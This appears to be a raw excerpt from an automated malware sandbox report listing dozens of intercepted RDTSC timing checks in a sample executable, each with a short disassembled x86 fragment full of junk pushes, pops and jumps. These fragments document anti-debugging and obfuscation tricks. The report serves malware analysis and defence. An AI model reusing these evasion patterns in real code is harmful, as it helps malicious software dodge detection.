                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB5DD3 second address: AB5E1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e xor edi, 63A4AEA8h 0x00000014 ja 00007FD0B534805Ch 0x0000001a push 00000000h 0x0000001c movzx edi, cx 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D2BC0h] 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD0B5348069h 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB5E1C second address: AB5E40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FD0B548336Ch 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB5030 second address: AB5034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ABF5EC second address: ABF5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ABF5F0 second address: ABF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ABF8A4 second address: ABF8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FD0B5483366h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ABF8B3 second address: ABF8DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348062h 0x00000007 jmp 00007FD0B534805Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ABF8DC second address: ABF8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC3782 second address: AC3790 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC3790 second address: AC3796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC3796 second address: AC37B8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B534805Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD0B534805Ch 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC37B8 second address: AC37C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD0B5483366h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC37C2 second address: AC37C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC383B second address: AC3876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5483372h 0x00000009 popad 0x0000000a jmp 00007FD0B5483375h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jbe 00007FD0B5483366h 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC3876 second address: AC388E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jbe 00007FD0B5348060h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC985F second address: AC9870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Ch 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC9B1C second address: AC9B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5348066h 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC9B3A second address: AC9B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FD0B5483366h 0x0000000d jmp 00007FD0B5483379h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AC9CC5 second address: AC9CE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD0B5348065h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A5849D second address: A584A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A584A1 second address: A584A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A584A7 second address: A584B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0B548336Bh 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A584B8 second address: A584BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD4AE1 second address: AD4B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jg 00007FD0B5483366h 0x0000000e jmp 00007FD0B5483370h 0x00000013 pop esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jno 00007FD0B5483366h 0x0000001e jmp 00007FD0B5483371h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD4B1D second address: AD4B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD4B24 second address: AD4B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD4B2A second address: AD4B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD4B2E second address: AD4B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD4C8C second address: AD4C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD50CF second address: AD50FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FD0B5483373h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD50FD second address: AD5103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD5103 second address: AD514C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483377h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007FD0B548336Ch 0x00000010 je 00007FD0B5483366h 0x00000016 jnp 00007FD0B5483372h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD0B548336Bh 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD514C second address: AD5150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD5577 second address: AD5588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B548336Ch 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD5588 second address: AD559C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007FD0B5348056h 0x0000000b pop esi 0x0000000c jc 00007FD0B534805Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD5741 second address: AD576A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD0B548336Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jp 00007FD0B5483366h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD5898 second address: AD589C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD589C second address: AD58C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD0B548337Eh 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD58C2 second address: AD58D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD58D2 second address: AD58D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD58D6 second address: AD58E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FD0B5348056h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD482D second address: AD4835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD7B43 second address: AD7B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AD7B47 second address: AD7B59 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0B5483366h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ADD189 second address: ADD194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ADD44C second address: ADD454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ADD454 second address: ADD460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0B5348056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: ADD460 second address: ADD465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA47BE second address: AA47C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA4BB6 second address: 8EEDD4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5483368h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D2ECCh] 0x00000013 sub dword ptr [ebp+122D2A5Dh], edx 0x00000019 push dword ptr [ebp+122D10E1h] 0x0000001f mov ecx, dword ptr [ebp+122D1B0Ch] 0x00000025 call dword ptr [ebp+122D1808h] 0x0000002b pushad 0x0000002c jp 00007FD0B548336Eh 0x00000032 jl 00007FD0B5483368h 0x00000038 xor eax, eax 0x0000003a xor dword ptr [ebp+122D2A06h], edi 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 mov dword ptr [ebp+122D2A06h], esi 0x0000004a mov dword ptr [ebp+122D2D0Ch], eax 0x00000050 jmp 00007FD0B5483372h 0x00000055 mov esi, 0000003Ch 0x0000005a stc 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f mov dword ptr [ebp+122D1928h], ecx 0x00000065 lodsw 0x00000067 cmc 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D18A2h], edx 0x00000072 mov dword ptr [ebp+122D1928h], edi 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jo 00007FD0B548336Ch 0x00000082 mov dword ptr [ebp+122D1928h], edx 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b push eax 0x0000008c push edx 0x0000008d push ebx 0x0000008e pop ebx 0x0000008f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA4C5F second address: AA4C71 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FD0B5348056h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA4C71 second address: 8EEDD4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+12461520h], edx 0x00000012 push dword ptr [ebp+122D10E1h] 0x00000018 mov di, 1861h 0x0000001c call dword ptr [ebp+122D1808h] 0x00000022 pushad 0x00000023 jp 00007FD0B548336Eh 0x00000029 jl 00007FD0B5483368h 0x0000002f pushad 0x00000030 popad 0x00000031 xor eax, eax 0x00000033 xor dword ptr [ebp+122D2A06h], edi 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d mov dword ptr [ebp+122D2A06h], esi 0x00000043 mov dword ptr [ebp+122D2D0Ch], eax 0x00000049 jmp 00007FD0B5483372h 0x0000004e mov esi, 0000003Ch 0x00000053 stc 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 mov dword ptr [ebp+122D1928h], ecx 0x0000005e lodsw 0x00000060 cmc 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D18A2h], edx 0x0000006b mov dword ptr [ebp+122D1928h], edi 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 jo 00007FD0B548336Ch 0x0000007b mov dword ptr [ebp+122D1928h], edx 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push ebx 0x00000087 pop ebx 0x00000088 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA4D07 second address: AA4D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA4D0B second address: AA4D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B5483377h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA4D26 second address: AA4D60 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2C20C430h 0x00000013 mov ecx, dword ptr [ebp+122D234Ch] 0x00000019 mov dword ptr [ebp+122D200Ah], esi 0x0000001f push 451966A5h 0x00000024 pushad 0x00000025 jmp 00007FD0B5348061h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA515C second address: AA516F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD0B5483368h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA5111 second address: AA515C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FD0B5348058h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1886h] 0x0000002d mov edi, dword ptr [ebp+122D2F33h] 0x00000033 push 00000004h 0x00000035 add edi, dword ptr [ebp+122D2D98h] 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA595B second address: AA59CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD0B5483368h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D213Ch] 0x0000002a lea eax, dword ptr [ebp+1248954Ch] 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FD0B5483368h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jbe 00007FD0B548336Bh 0x00000050 mov ecx, 7424BC5Ch 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jns 00007FD0B5483368h 0x0000005e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA59CE second address: AA59D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA59D4 second address: AA59D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA59D8 second address: A81488 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FD0B5348058h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+12489508h] 0x0000002f xor edx, 09F80EACh 0x00000035 push eax 0x00000036 jbe 00007FD0B5348060h 0x0000003c pushad 0x0000003d jl 00007FD0B5348056h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 mov dword ptr [esp], eax 0x00000049 mov dword ptr [ebp+122D191Eh], ecx 0x0000004f call dword ptr [ebp+122D3A25h] 0x00000055 pushad 0x00000056 jmp 00007FD0B5348063h 0x0000005b push edi 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e pop edi 0x0000005f popad 0x00000060 push esi 0x00000061 jnp 00007FD0B534805Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE210F second address: AE2113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE2113 second address: AE2117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE2117 second address: AE2144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0B548336Bh 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 jmp 00007FD0B5483370h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A6276A second address: A62793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jns 00007FD0B5348056h 0x0000000f ja 00007FD0B5348056h 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 jmp 00007FD0B534805Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A62793 second address: A62799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE5627 second address: AE5648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0B5348066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE5648 second address: AE564C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE564C second address: AE5652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE8BD6 second address: AE8BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE8BDA second address: AE8BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE8682 second address: AE8686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AE8686 second address: AE8695 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0B5348056h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AF13DA second address: AF13EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
